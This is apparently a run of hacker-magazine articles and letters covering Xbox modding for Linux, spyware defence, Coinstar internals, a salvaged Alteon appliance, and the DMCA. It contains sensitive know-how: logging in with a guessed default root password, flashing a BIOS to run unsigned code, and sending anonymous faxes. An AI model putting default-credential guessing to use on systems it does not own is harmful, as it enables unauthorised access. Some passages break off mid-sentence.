This brings us to the actual installation. You will need a modified Xbox to consider such a setup. However, this is not as scary as it may sound to those who might not have soldering experience. Gone are the days in which you would have to solder 29 wires to the Xbox motherboard.
You can now buy wireless mod-chips which require no soldering at all. There is a chip out now called the Matrix (by Xodus) that is wire free and can be installed in a matter of minutes. There are also other chips in development that will be wireless also, so then it would be just a matter of personal preference as to which you would choose. I have chosen to go with the Matrix chip because it has no wires to solder, comes with a programmer, and, as far as I have seen, is the easiest to install. I must mention also, if you don't want to fork out $60, you can make your own. CheapLPC, designed by Andy Green, can be constructed for a few bucks. Visit http://warmcat.com/milksop/index.html.

So this is where we start. You have your mod-chip of choice. You also downloaded the .iso image of the Xbox Linux distribution located at the sourceforge site mentioned at the beginning of the article. You will need to flash your mod-chip with a BIOS that will support running unsigned code on the Xbox. These BIOSes can be readily found on the Internet with a little due diligence. I mentioned that the Matrix mod-chip comes with a programmer. You can plug that programmer into the parallel port on your computer and flash the Matrix with BIOS software that way. You can get the flashing software from http://warmcat.com/milksop/index.html (Xodus will release their own GNU software shortly). I have chosen to go with the EvolutionX 2.5 BIOS because it supports all the features one would want, such as running unsigned code, among others. Next, you will have to download the EvolutionX dashboard, which will replace the original Xbox dashboard and will act as your new interface with the Xbox, and burn it to a CD-RW (Xboxes do not like CD-Rs). This can also be found on the net with a little patience.

You will then need to open your Xbox and physically install the mod-chip. After that, you will want to install the EvolutionX dashboard that you downloaded and burned to CD. You will now have a pretty new interface that has many features, such as backing up games (that you bought) and whatnot. Once this is installed, you will then be able to install your downloaded Linux distro.

You might be thinking, how do I work with Linux when all I have is an Xbox controller? Well, as you might know, the controller ports on the Xbox console are really just usb ports, with a little modification. You can get ahold of an Xbox controller extension, cut it in half leaving the end that plugs into the Xbox intact, and look at the wires. You will see a red, green, blue, white, and yellow wire, the same as a standard usb cable minus the yellow one. You can then cut a usb cable, leaving the usb A end intact which connects to your usb keyboard/mouse. Solder the matching wires together and leave the yellow Xbox wire by itself. Do this two times and you now have a keyboard and mouse that you can plug into the Xbox and use with Linux, assuming Linux supports the ones you chose (make sure it does).

There you have it. A Linux/Xbox that can now be used as you wish it to be, and the best part about it is that it is legal. The developers that have been working hard on this Linux project are not building this software on top of the Microsoft kernel - they are using the Linux kernel. They are also not using non-licensed software like the XDK, which is Microsoft's development kit for the Xbox. The reverse engineering that has been done has been done under Section 1201(f) Reverse Engineering Exception for interoperability of the DMCA.

I am indebted to the Linux developers of xbox-linux.sourceforge.net, the Xodus team, Xboxhacker.net (and its forum), Andy Green, and several other sites/individuals/hackers that have made this article possible. I will cover the more technical aspects of Xbox hacking in a future article, but I hope I have given enough information so that you might get a start with hacking Linux onto the Xbox, and learn in the process.

by 0A/3_ 3>3d_MU/VsLV
haxor2600@mailcity.com

This short article is far too small to encompass this topic but hopefully it will focus more attention on the increasing problems of removing spyware and adware.

Any hacker running a Windows operating system is going to come across some spyware or adware at some point. Popular file sharing P2P software are typically one of the most common areas where adware is installed. An example of this would be Kazaa P2P, which by default installs cydoor (cydoor.com).

Spyware and adware are often hidden deep in the Software Licensing documents and Terms And Conditions when you install the software. This can result in such things as your day-to-day activities being broadcast to strangers or annoying ads being projected in your face every few minutes.

To make it more confusing, adware isn't necessarily spyware. Registered shareware without ads may be spyware, and purchased out-of-the-box software may contain adware and may also be spyware. In addition, software updates may change a previously ad-free version into an adware product. All this means that users need to be on guard when installing any type of software.

While legitimate adware companies will disclose the nature of data that is collected and transmitted in their privacy statement, there is almost no way for the user to actually control what data is being sent. The fact is that the technology is in theory capable of sending much more than just banner statistics - and this is why people (especially computer hackers) should feel uncomfortable with the idea.

To top it off, if you have a slow computer or Internet connection the resource hogging adware or spyware can cause system and browser instability and slowness, as well as slow Internet connectivity even more.

How Do You Protect Yourself?

1. Read the terms and conditions of the license carefully before pressing "accept."
2. Run a spyware or adware removal software tool. There are many free versions available.
3. Avoid spyware at all costs. Run a firewall utility like Zone Alarm (zonelabs.com) that specifies which programs can access the Internet and how. Pay attention to what is asking for permission to connect online.
4. Hack a way to circumvent the spyware or adware software and most importantly post these to a hacker message board or to a hacking website.
5. Avoid adware. If you're broke and can't buy a clean shareware product, find an ad-free, non-spying equivalent of the program you need. This can be hard since many popular programs come only with adware installed.
6. Learn to use a packet sniffer to identify transmissions that sneak through your browser and other trusted apps.
7. Get to know your registry really well, especially the HKEY_LOCAL_MACHINE\SOFTWARE, HKEY_CURRENT_USER\Software, and for Win2k HKEY_USERS\ areas. If you notice software installed that you are suspicious of, check to make sure it's not spyware or adware.
8. Manage your startup programs carefully. Check the registry or use "msconfig" or a similar startup manager or alternatively download and install a free task manager to check and kill running spyware/adware.
9. And finally, you can also reverse engineer the adware software and find a way to corrupt the data being transmitted. Alternatively develop your own program to transmit dummy data to the adware/spyware host servers. If you do achieve this, post the results to a hacker message board or to a hacking website.

Some good ad removal programs are: Opt-out (grc.com/optout.htm) and Ad-Aware (lavasoftusa.com).
Also, visit the following websites: scumware.com, security.kolla.de, and spywareinfo.com.

In summary, spyware and adware are not illegal types of software in any way. However there is almost no way for the user to actually control what data is being sent. My guess is that a delivery system like the ones used by spyware and adware corporations would be the most efficient way for governments to spy on the public. They probably have already thought of using this system so hackers beware.

Shouts to VISA_burglar, Greg_Ipp, Jalaludin_Rumi, _SfR_BU_D_, Scrappy.

[Image: Sprint billing statement. Caption: Here's our August Sprint bill - a little higher than usual, but otherwise normal.]

slow a process and causes too many errors in the identification of coins. Rather, a complicated process involving electromagnetic identification is used. Coinstar currently holds U.S. Patent Number 6,196,371 for the device and the abstract of the patent provides a good explanation of how it works:

Coins, preferably after cleaning, e.g. using a trommel, are singulated by a coin pickup assembly configured to reduce jamming. A coin rail assists in providing separation between coins as they travel past a sensor. The sensor provides an oscillating electromagnetic field generated on a single sensing core. The oscillating electromagnetic field is composed of one or more frequency components. The electromagnetic field interacts with a coin, and these interactions are monitored and used to classify the coin according to its physical properties. All frequency components of the magnetic field are phase-locked to a common reference frequency. The phase relationships between the various frequencies are fixed, and the interaction of each frequency component with the coin can be accurately determined without the need for complicated electrical filters. In one embodiment, a sensor having a core, preferably ferrite, which is

the right and left side of the tape when held under ultraviolet light; (2) On the rear of the receipt, there is a small box with nothing in it. If a coin is rubbed across the box, the Coinstar logo appears.

However, far more interesting than the actual machine is the Coinstar network. Each machine contains a modem and a phone. Each machine dials the Coinstar headquarters every night and downloads the day's usage statistics. These include the number of coins counted, what types of coins were counted, the number of transactions, the average dollar amount per transaction, and the reject percentage (used in determining if a machine is rejecting an excessive amount of coins, which is cause for a technician to be sent out to examine it). A normal reject percentage is around one percent, however slightly higher percentages may be simply due to people inserting all kinds of foreign matter into the machines.

In addition, the machine analyzes the last week's worth of usage statistics, and estimates the day it will be full. An armored car will then be scheduled to empty the machine on that day, or possibly earlier. The machines also contain diagnostic software that will automatically page a technician if a problem occurs.

Occasionally, Coinstar sends software updates to the machines to fix bugs, add features, and advertise promotions. These updates are also downloaded to the machines during this time period.

All of these statistics are stored on servers at Coinstar's headquarters in Bellevue, Washington, and many employees can access them over the network through software loaded on their computers. I received a tour of the headquarters several years ago, and at the time all the servers were running NT 4.0.

I did notice another interesting feature while at Coinstar Headquarters. They had a row of machines, dating from the earliest machine through their future models that had not yet been released. Some machines were on and functioning, others were off. However, one (a current model) displayed a "Press CTRL-ALT-DEL to logon" message, as commonly seen in Windows NT 3 and 4. For this reason, I have a suspicion that the machines run some form of Windows in the background, or at least have the capability to do so.

In addition, the machines contain a phone that is linked directly into the Coinstar network. If a store employee needs to schedule maintenance, check the next coin pickup, or do any number of other things, he just needs to open the machine (it is locked with a key) and pick up the phone. Also, when the machine is opened, a pin code must be entered to obtain access to the diagnostic software, statistics, and to change the options of the machine. This code is also needed to access the phone. I personally have not had the opportunity to access this part of the machine, mainly due to the lock and the security cameras right next to it (however, the lock is the main obstacle).

For all its ease of use, a lot of technology sits behind the green plastic of a Coinstar machine, much of which I still have yet to uncover.

by phantasm
phantasm@textbox.net

Among many of the things I love to take part in, dumpster diving always has that small thrill of actual treasure hunting. Sooner or later you are bound to find a manual with enough information to keep you reading for a few days or even months. Other times you may get lucky and find an old computer that has parts you can use.

A few months ago, during my weekly dive excursion, I happened to stumble upon quite a treasure in my favorite dive spot. On top of the dumpster sat a beautiful green system, just under 18" wide, 24" deep, and 1.7 inches tall. I was quite excited about finding something aside from the usual post-it note about where they were going to eat, or the regular office memo to put cigarettes in the ashtray outside and not on the sidewalk.

I dropped my umbrella, and after a few attempts to get to the top of the dumpster, I made it and put it in my car. Unsure of what exactly it was, I dug around a bit more for a manual or something about it and found nothing.

Later that evening I got home and peeled it apart, noting it was quite compact internally. Inside were three PCI slots used by a Fiber Gigabit Ethernet adapter and two CryptoSwift SSL cards. The CPU was an Intel Celeron 500, 64M RAM chip, and a 64M CF card as its drive. Looking more into it, I noticed there was no keyboard port, or a video connector at all, so getting into a console would be a slight challenge.

After writing down part numbers, I put it back together and did a few searches. It appeared I had an Alteon iSD-100 and off I was on a search for technical documentation. Hooking it up and attempting to power it on, I found the power button was broken off. A pen tip was all I needed, and the whir of the fans chimed through the room. Running a serial cable from its serial port to my system, I tried to get a console that way with no luck. After a bit more reading, I discovered a need for an Alteon WebSwitch to access the system. So it was time for a lot more research.

The board inside was labeled Teknor Applicom, Inc., with a PCI-946-1 system board. By using a PCI Video Card, I was able to remove the Fiber card and replace it to get a video output of what was going on during boot. I was quite pleased to see the system was fully functional and booting fine.

The manual for the board showed the pinouts for its connectors, which was a wonderful help. I was able to find the keyboard interface information in the manual (page 108 of the PDF), and set up to find a way to add my own.
With an old P-II board that got fried, I cut out its PS/2 keyboard connector with some snips, removed the excess solder from the pins, and cleaned it up for a better connection. I had to figure out a way to set up the connector around the way this case was set up. In the true form of imprecision, I grabbed a nice length of Cat5 cable (once again found dumpster diving) and stripped the ends of the wires bare for a connection.

After some solder work we had the wires connected to the PCI-964 board and ran the Cat5 to the back of the system to another hole provided for another serial port. The connector was soldered on at the other end and some electrical tape to guard the bare wires and pins from the case.

Plugging up a keyboard, I started it up and saw the damage that could be done. During the BIOS load, the keyboard lights came on, and Red Hat Linux began to boot. Staring at the Login/Password prompt I was quite excited. Of course I started with a quick basic guess for root with the password alteon and there I sat at a working console. A quick browse around to see what was there and I powered it down.

I removed a crypto card and popped in a 3Com NIC, rebooted, brought up the interface, and turned on SSH. A few changes to set it all up automatically for me, another power down, removal of the video card, and brought it back up. I now had a system to play with at my desk for more comfort.

From there I got a bit more curious and wanted to expand the system some more. I added 256M of RAM, then attempted to add a 20Gig HDD and a CDROM. I didn't have much luck with that, but found out if I removed the CF Card I could use the HDD on /dev/hde where the CF used to be. After a bit more playing, I got Linux installed on the 20 Gig drive on /dev/hde and it was working fine as a home server.

The system provided me with well over a month of fun and learning, as well as some interesting calls to Nortel trying to understand the BIOS and restrictions set into it.
Granted I did not get much information - it was brought to my attention that reselling it required removing and adding a new BIOS chip which I am too lazy to do.

The moral of this long-winded article? Dumpster diving can provide you with expensive treasures and a long time of fun and learning.

Thanks to 404 and Tyler for assistance on systems running CompactFlash cards and the rest of Textbox Networks for help on other areas of learning the system.

Related Sites
Alteon Users Guide: http://www142.nortelnetworks.com/bvdoc/alteon/isd_ssl/050125.C.pdf
Teknor Applicom PCI-946-1 Hardware Guide: http://www.kontron.com/techlib/manuals/PCI-946H_and_P3544QBX_manual.pdf

The Digital Millennium Copyright Act (DMCA) and the Digital Media Consumers' Rights Act (DMCRA) are at the opposite ends of the "copyright rights" axis, so to speak. Representative Boucher and Doolittle's DMCRA will amend the changes made by the DMCA to prevent the corporate abuses of power that have been possible under the DMCA.

The DMCA was enacted in 1998 to take effect in the year 2000. The DMCA modified the U.S. copyright statutes to provide protection for copyrighted digital material. Since 1790 Congress has made modifications to the U.S. copyright statutes to accommodate new material. The DMCA is just the next step in the series of modifications to the copyright statutes. There were other reasons for the DMCA's enactment. At the 1996 World Intellectual Property Organization Diplomatic Conference, the U.S. adopted the World Intellectual Property Organization treaty. There was a perceived need to comply with that treaty: the DMCA made that compliance but added much more than was necessary. Copyright owners were rightly concerned that their works would be pirated on the digital frontier.

Congress did not intend for the DMCA to be abused as it is so today. The DMCA was enacted to clear the gray area of pirating copyrighted digital works and to ban the "black box" type devices intended for that purpose. In practice it has worked to that end and beyond. The new clauses and provisions to the copyright statutes have been abused aggressively to stifle and control many legitimate activities. The DMCA added anti-circumvention measures to the copyright statutes that forbid under penalty of law gaining access to a work by "circumventing a technological protection measure that would otherwise effectively control access to a copyrighted work." The DMCA also prevents the import, manufacture, or export of any device that can circumvent that protection. By doing this the DMCA gives copyright holders complete control over their works, no matter what the circumstances.

Historically, the U.S. copyright laws haven't given copyright holders this total control. A major "safety" on this type of control is the fair use doctrine. Fair use allows the end user to make copies of a copyrighted work for personal use, educational use, use in commentary, criticism, and parody or any other solely socially beneficial use. A work protected by the DMCA cannot be copied by the end user without the express consent of the copyright holder. This completely nullifies the fair use doctrine and tilts the balance of power dangerously toward the copyright holders. By the same means the DMCA takes away the rights of First Sale and Limited Time. First Sale gives the end users the right to sell a copy of a work over and over once it is made. Limited Time limits the time that a copyright is in effect. The copyright is granted for a limited time and after that time is up the work goes into the public domain.

The power that copyright holders now have over these rights is shown in their use of the DMCA. Dimitry Sklyarov, a young Russian Ph.D. at Moscow University, was invited to speak at Defcon about some of his research.
His speech outlined Adobe's e-Book security and its weaknesses. He and his company had developed a program that allowed the end user to make copies of an Adobe e-Book, which was completely legal in Russia but illegal under the DMCA. He was arrested. Not for copyright infringement or for helping anyone else infringe upon copyright, but solely for citing weaknesses in e-Book security. He was arrested because someone he never met might use what he learned through his research to copy an e-Book without the publisher's permission. Adobe used the DMCA to punish Sklyarov for speaking out about his research. After months of imprisonment Sklyarov was finally released under an agreement with the Department of Justice. After his release the DMCA continued to prosecute his employer, ElcomSoft, under the criminal provisions of the DMCA. ElcomSoft is based in Russia where there is no DMCA. The DMCA is reaching across continents to stifle free speech.

Prior to this, the Motion Picture Association of America (MPAA) brought suit against 2600 Magazine for publishing DeCSS on its website. DeCSS is an open source application that allows Linux users to play DVDs. DeCSS's primary use is a DVD player. It also has the ability to change file formats from DVD to MPG which is like playing a DVD and recording it to a VHS tape (which is, again, legal under the fair use doctrine). Because it can do this it has become the target of the MPAA through the DMCA. 2600 was not accused of being involved in the development of this tool, nor was it accused of having used the software for copyright infringement. The lawsuit was brought upon 2600 simply for making the source code available. Free speech was denied to 2600 when they were enjoined from publishing the DeCSS source code. 2600 lost the case and lost the appeal.
Some good can be said to have come of this though - it was decidedly the most public display of the dangers of the DMCA yet. The case provided a wake-up call to the hacker community and gave the world a glimpse of what corporations can do with the DMCA.

In September of 2000 the Secure Digital Music Initiative (SDMI) issued a public challenge encouraging the hacker community to defeat new watermarking technologies the SDMI hoped to use to thwart piracy. Professor Edward Felten and his team of researchers from Princeton, Rice, and Xerox took up the challenge and succeeded in circumventing the watermark controls on the music files. When the team tried to show their research at the 2001 Usenix conference, the SDMI threatened Felten with the DMCA. The threat was in the form of a letter that was delivered to Felten and his team as well as their employers. Sharing research such as Felten's is common practice in the computer science field. It shows others' mistakes and can only lead to better solutions. If Felten and his team presented their research the original security technology would of course be compromised, but many would offer suggestions to improve or replace the weak technology. Even after SDMI had given Felten and his team permission to circumvent their watermarking technologies, they were still able to revoke the right of free speech with the DMCA. Felten's team brought suit against SDMI and subsequently made a partial release of their research.

Prominent Dutch cryptographer Niels Ferguson recently discovered major flaws in a commercial hi-definition video encryption system. Ferguson rightly fears legal action under the DMCA and has therefore declined to release any of his work. He doesn't talk to his peers and scientific colleagues for fear of his research simply reaching the U.S., which he thinks could be interpreted as a violation of the DMCA. This shows the beginning of a horrible trend.
Scientists are withholding research or simply avoiding the U.S. out of fear. Scientific development in the U.S. is being stifled for the benefit of the corporation. Scientists now fear the U.S. They fear the "Land of the Free" because corporations are given power over individual rights.

The DMCRA will give that power and the rights back to the consumer. This bill will restore the historical balance between copyright holders and the end user. If this bill passes in the next session, the rights that the DMCA threatens will be restored. It will reaffirm the fair use doctrine in the digital world, making it legal to circumvent a technological measure preventing access as long as the circumvention falls within the guidelines of the fair use doctrine. It adds exemptions for scientific research which reestablishes the Betamax standard. The Betamax standard would, in the digital world, allow the manufacture and distribution of software or hardware that can be used to circumvent technological protection measures as long as it has a legitimate use. The reestablishment of the Betamax standard would put scientists at ease and encourage scientific research to continue as it always has in an open forum style without fear of prosecution for discoveries. Security can again be developed, unimpeded by the DMCA. Proper labeling of "copy-protected CDs" will also be ensured. This new breed of CDs, marketed as regular CDs, have been known to have playback problems and have also crashed quite a few computers with their aggressive protection measures.

This bill has already won the support of many major public entities. The supporters include: Intel Corporation, Philips Consumer Electronics North America, Sun Microsystems, Verizon,
Gateway, Consumer Electronics Association, American Library Association, Association of the American Universities, Association of Research Libraries, American Association of Law Libraries, Medical Library Association, Special Libraries Association, Digital Future Coalition, Consumers Union, National Writers Union, Home Recording Rights Coalition, American Foundation for the Blind, and the Electronic Frontier Foundation. Many of the supporters are library or writer associations of some kind. It can be inferred that the libraries and writers may fear the DMCA as the means to an end of an era, an era of free speech and fair use.

The way is now clear - the public's rights are threatened and the DMCRA is their boon. Libraries and writers across the United States gather under the DMCRA's flag. Without the DMCRA organizations like the MPAA gain more of a foothold in our society. Organizations like the Electronic Frontier Foundation have long known the effects of the DMCA and the power it grants to corporations. The MPAA's actions have paid off, but not in their favor. The average citizen has at least heard of the DMCA and many have now joined the fight against it. When the DMCRA is enacted, the power will be returned to the people.

Greetz: Kahian, Zim, Bill and Ducky. Save Farscape.

Spreading News

Dear 2600:
Some readers may already know this, but sneakemail.com is a service that allows one to generate disposable email addresses that forward to your real address. It provides a self documenting method of tracking who sells your email address so that you can confront those companies with proof that they sold your address.
NoSpa tim

Dear 2600:
In 19:2, you printed a letter from one "MW" who was asking about how to send anonymous faxes. For a small fee,
this person could use an e-fax service such as www.maxemail.com to send a fax anywhere the user accesses the Internet. Using a good proxy server or other anonymous access point would allow the user to send an anonymous fax.
Along these lines, users wishing to receive anonymous faxes may find the free services of www.faxwave.com to be useful. They assign you a unique phone number (no extensions!) and receive the faxes for you. Upon receipt, the transmission is converted to a .tif file and emailed to any email address of your choosing. All numbers are issued from the 775 area code and the exchange varies but is usually local to Reno, Nevada.
Keith

Dear 2600:
This is regarding the fax from Direct Media America on page 13 of 19:3. Looks like there's an ongoing investigation of Direct Media America by the Florida Attorney General.
scott

We certainly can't say we're surprised.

Dear 2600:
Many people probably already know about this, but www.payphone-project.com/ is a website with the phone numbers to thousands of payphones all around the States.
Sfctrdonicus

Hopefully the kind that still take incoming calls.

Dear 2600:
I truly admire your magazine and how hard the staff of 2600 works to show us the information which the government and corporations try to control and distort. You're a group that the government tries to suppress like any group that stands against the system, one that will be targeted by those in "control" just to protect their own interests. Soon I'll be starting a 2600 meeting here in Puerto Rico with technological themes and political issues too, highly influenced by your magazine. You people are an inspiration for the hacker community and I really appreciate your struggle away.

Feedback

Dear 2600:
I have been following the topic of right click suppression in your magazine for the last couple of issues and decided to put my two cents in. I am a photographer and on my website, my gallery images have right click suppression on them.
The reason for this is rather interesting. I feel that if you really appreciate an image that I have and want to have a copy of it, you should either contact me or, even better, find a way to work for it. This is one of the basic parts to hacking in my book, finding new ways of learning. It is not harmful or destructive, and if you find a way around something, then you have learned something new. Props to you, and keep up the good work.
Traveler

Dear 2600:
In response to Erovfs comment about script kiddies and the ratio of master to newbies:
The way our world is now is fine when it comes to the script kiddies and the masters ratio. Both have different goals. The masters' goal is to expand their abilities and show off by creating the program. Recognition for the program is among peers, not by the ignorant majority that is clueless to the true art of anything they do. Masters are happy how they are, programming. Script kiddies find joy in just breaking into school computers and by petty acts of malice that bring recognition by the ignorant masses. That makes the script kiddies happy. As long as everyone is happy, what's the problem?
XiChimos

We weren't aware that everyone was so happy. Perhaps we could join in a chorus of Ode To Joy if the people committing "petty acts of malice" stopped calling themselves hackers to the ignorant masses.

Dear 2600:
I just finished watching Freedom Downtime two minutes ago. I finally got around to ordering it and as soon as I got home and saw that package in my mail I opened it up and popped it in the VCR. I just want to say I thought it was great. I especially enjoyed the Miramax protest and your across the country trip to get the word out about Kevin. I plan on making copies and giving them to my friends; I also hope to have a showing at my school. Thanks for taking the time to make such a great film and keep up the good work.
joe

Dear 2600:
I just read the article in 19:2 about doubleclick.
net and how evil it is, as well as the letter with a solution involving iptables. This is all fine and dandy, but it definitely looks like killing a dog with a cruise missile. The first thing I did was start up Mozilla and see what it had in its preferences, and I saw that not only does Mozilla have reasonably flexible cookie blocking stuff, it has image blocking stuff as well. Here's the easy two-step process that doesn't require firewall software or root access (a definite selling feature on those lovely university unix labs):
1.) Change your cookie setup. Only accept them from the originating web site and tell it to ask before storing a cookie. Mozilla can remember your decision about cookies, so the dumb popups are a one-time affair for sites you visit regularly.
2.) Find a site with doubleclick.net ads. I googled for "funny puppies" and won on my first try: "block images from this site" on the ad (right click, duh). I'm moderately annoyed that they didn't let you add sites to block images from in the preferences menu, but you can't win them all, I guess.
I don't know what they manage to squeak by with javascript, but Mozilla lets you disable javascript's access to cookie data, its ability to make cookies, change images, and so forth, so it can probably be mostly curbed. The preferable solution would be to ignore javascript and images based on a configurable list of keywords.
Opera has similar features, but I don't think they're as complex. IE's approach to this seems to be along the lines of telling the user, "don't try to hide from my money grubbing masters or I will crash your computer." I haven't checked konqueror yet.
Bob M.

Dear 2600:
This is a response to a letter written by que! in 19:2 which suggests blocking web ad images by adding each image server IP to Linux netfilter rule tables. There are several much easier ways to block ads, such as:
1.) Add the server's name and the address 127.0.0.1 to your /etc/hosts file.
(Windows has a hosts file too at C:\windows\hosts or C:\winnt\system32\drivers\etc\hosts.)
2.) Use a browser (such as Mozilla) or browser plugin that can give you better control over the images that the browser downloads and displays.
3.) Most importantly, try out a personal web proxy such as Privoxy, Adzapper, WebWasher, or Guidescope. If you haven't heard of any of these, Google is your friend.
Eil

Dear 2600:
Thanks for publishing so much discussion of the gun control issue. Despite the fact it is not directly connected to hacking or freedom of information, your readers seem to be very interested in it. I'm a new reader who picked up a bunch of back issues at H2K2, and I've been following the debate backwards to 18:3. I'm sorry you don't support the right to bear arms the way, say, American Rifleman (the main NRA magazine) supports freedom of information.
I would like to point out a nonsense statement: "If only hackers were treated as well as gun owners in the United States!" Violation of the DMCA of 1998 carries a penalty of up to five years in prison for a first offense. Violation of the NFA of 1934 (for example owning what the DoD calls an assault rifle, sawing off a shotgun, or making your own gun of any kind) carries a penalty of up to 10 years in prison.
I also feel (although this is more subjective) that the plethora of laws governing firearms ownership are more onerous; I've never been fingerprinted in order to buy a packet sniffer, or had to appear in person at the sheriff's office for a license to carry a password hash cracker. I do not risk five years imprisonment for forgetting to clear some software off my laptop when I go to visit my parents in New Jersey; if I accidentally leave any standard hunting ammo in my car, I risk that.
Charles

If you act like an idiot with deadly weapons, you should be prevented from continuing to do so.
It's amazing how many people see that as a violation of their rights yet will blindly support idiocy like the Patriot Act without a second thought. What we don't support is the attitude that anyone who suggests any form of regulation of firearms is somehow advocating disarming the populace, no doubt in furtherance of some hidden agenda. It's an hysterical reaction that only manages to demonstrate how bad the problem is. There are all kinds of legitimate reasons to own guns. But, being deadly weapons, they cannot conflict with the needs of society. That's why we frown upon walking around schools and churches with firearms, regardless of what you think the Constitution says you can do. It's why deranged individuals tend to be discouraged from becoming gun hobbyists. These directives are coming from the people, not from some invading government.
If we can get major politicians clamoring for the rights of hackers and the "National Hacker Association" challenging the government to pry our keyboards "from our cold, dead hands" then maybe hackers will have a chance of being treated better than gun owners. Until that day, it's an absurd comparison.

Dear 2600:
Regarding the cover of 19:2, I was wondering if that "building" that kinda looks like the U.N. is actually an integrated circuit that I've seen in some touchtone phones from the 70s and 80s, and the round "building" being a receiver or speaker of some sort. Is that right? I noticed because the "building" is not facing the same direction as any of the others. Nicely done! Thanks for your magazine - love every minute I read it.
ShadowfaxO

You're very observant. But we really don't deserve the credit this time. The round building is actually Madison Square Garden with the surrounding ones being part of the Pennsylvania Station complex in Manhattan. Across the street (in the middle of the cover) is the Hotel Pennsylvania which is where the HOPE conferences are held.
A trained eye can see the little bridge that hooks two of the conference rooms on the top floor together.

Dear 2600:
I am a 2600 subscriber. Recently by chance I viewed Freedom Downtime on Free Speech TV (FSTV) and was amazed to learn about the details of Mr. Kevin Mitnick. The reason for my letter is to basically express my opinion on the case.
First of all, where is the American Civil Liberties Union? Have they ignored Mr. Mitnick's case? This is definitely a case for the ACLU.
Needless to say what Mr. Mitnick had to endure was unnecessary and illegal. I feel that the film should have concentrated a lot more on the constitutional issues and made it clear that one of our inalienable rights given to everyone living in the United States of America by the U.S. Constitution (the supreme law of the land) is the right to a speedy trial.
What I fail to understand and what the film does not fully explore is how any jurisdiction was able to keep a man incarcerated for such a long time without a trial. The film leads me to believe that Mr. Mitnick was deprived of his freedom until he acquiesced to a guilty plea. Is this the case? Was the government holding him hostage in exchange for a guilty plea?
Should this be the case, then the entire movement and Mr. Mitnick should file suit against all parties involved in the unlawful detention, and the civil liberties and constitutional abuses toward Mr. Mitnick. The film concentrated heavily on what Mr. Mitnick did not do, on the lies various writers were writing about, on the hacker community, and Mr. Mitnick's detention without a trial. But I believe it failed to drive the nail down to the core by not mentioning the constitutional erosion his case represented and the danger of his situation for the sake of all Americans.
Please do not get me wrong, I respect all of the hard work that went into the film and the movement as a whole. I am just offering a perspective which I believe would get a stronger response from the legal and political community. I would not want to think that all of the hard work of the civil liberties movement of the 1960s or the injustices and the suffering of those who then fought very hard to keep the integrity of the U.S. Constitution and the Bill of Rights were suddenly forgotten when Mr. Mitnick was denied his freedom, placed into solitary confinement for eight months, and left incarcerated for about four years without due process!
Any state representative, Senator, or Congressman should hear Mr. Mitnick's story and all parties involved in this abusive behavior should be prosecuted. This is of paramount importance. Perhaps I am naive and I have too much faith in our Constitution and I cannot begin to imagine how these abuses could have been so blatantly executed by the authorities. Any competent constitutional lawyer should have been able to have him released. It is very very difficult for me to believe the events as they were explained in the film. I greatly respect the effort, time, and energy that went behind the scene and the entire Free Kevin network. However I cannot understand why one of the most powerful weapons and protection (the U.S. Constitution) was never mentioned in the film.
Mr. Mitnick's liberty as well as all of our liberties are at great risk. His case should not be forgotten and the Free Kevin movement should evolve to the next level. A level of awareness, education, and realization where his case should be made known on legal foundations and the indisputable truths should be addressed and examined by professionals as well as political representatives of the people (there are still some honest ones out there).
A level where the legal system should take steps to correct itself and publicly admonish those who were involved in this case. Otherwise we are all in great trouble. I conclude where I started. Where is the ACLU?
hawk 20041

All of the questions you asked are ones that we also struggled with throughout the making of the film. It's frustrating not to get clear and definitive answers. And we wish it were that easy to actually get justice after demanding it. For now, we'll have to settle for trying to educate the masses. Please help spread the word and maybe you'll manage to get some sort of response from those responsible.

Dear 2600:
I have to commend Kevin Mitnick and William Simon for their amazing book: The Art of Deception. We have begun living in an era of secrecy and of suspicion, and still the weakest factor in any situation remains the human element. It's hard to give this book just praise without sounding like an advertisement. Amazing work, Kevin, simply amazing.
Poetics

Dear 2600:
I've picked up your last four issues and have found myself sincerely enjoying them because of your lack of bias. In journalism it's difficult to separate your personal feelings toward a subject from the writing you do on it, and 2600 is mainly focused on topics people feel strongly about. But what makes your publication superior, or unique in any case, is that you usually can't be caught putting down other people's views or campaigning your own. It's the mark of a well thought out organization of articles that allows your quarterly to maintain a calm composure during days of civil unrest... days that won't end while we are alive simply because the public remains apathetic while power-hungry fat cats grow fatter. I'm not going to the extreme here - insurrection is only necessary when we agree it's necessary, but readers and writers of your publication seem to be of the intelligent group that understands their rights and won't give them up without a struggle.
Nietzsche

Thanks for the kind words but we are most definitely biased. It's really impossible not to be, especially with this kind of subject matter. What's most important, as you point out, is to respect other opinions. Otherwise, there's little chance of a meaningful dialogue.

Dear 2600:
What's up with publishing an outdated article on shopping cart flaws (19:3)? The flaw that Mr. Moore discusses has been around for as long as I can remember and has been fixed, for the most part, by shopping cart authors that are worth anything. As a former site designer/network admin I ran into this problem with some shopping cart software way back in 1998. I contacted the author and the problem was patched up within days. I'm wondering if Mr. Moore has informed the company in the article about their problem? If not, as an ethical "hacker," I think that would be the honorable thing to do. Our job is to help people learn from their mistakes, not punish them for it.
JaMmSr

We exist to report on discoveries and findings. Anything beyond that, good or bad, is extracurricular. As for this article, you seem to be against its being printed regardless of whether or not it was outdated. If all of the bugs were fixed before we printed them, then we would indeed be printing outdated info and getting more complaints like yours. But non-outdated info leads to implications (like yours) that we're punishing people and not being ethical. It seems we can't win.

Dear 2600:
Thank you for your reply to my letter regarding people's saved email files being shared on Kazaa. While I don't agree that reading other people's email which they are sharing is "clearly an invasion of privacy" in the same way that reading private mail my neighbor posts on a billboard on his front lawn wouldn't be, I respect your opinion on the matter.
Also, I should have added that it's always best to email those found affected and let them know they're sharing the wrong stuff. I've gotten both thanked and threatened in response to that, which is nice.
Rob T. Firefly

We didn't mean to imply that the privacy invasion was your fault. And what you did certainly isn't a crime. But those who go around using other people's stupidity to invade their privacy are still invading their privacy, albeit in a passive way much like listening in on private phone calls broadcast in the clear. By letting the world know you performed a valuable service.

Dear 2600:
This is in response to HJH's article "A Nasty NT Bug" in 19:2. I'm happy to say that the bug reported in the article has been patched. Whereas I am unsure when Win 2000 was patched, Win XP was fixed by SP1. Also, the current Beta of Win .NET is completely immune from this bug. I guess it just goes to show, when 2600 talks, Microsoft listens. Good show, and keep up the good work.
Jason Argonaut

It's quite possible this was reported in some other way but thanks for the good thoughts.

Dear 2600:
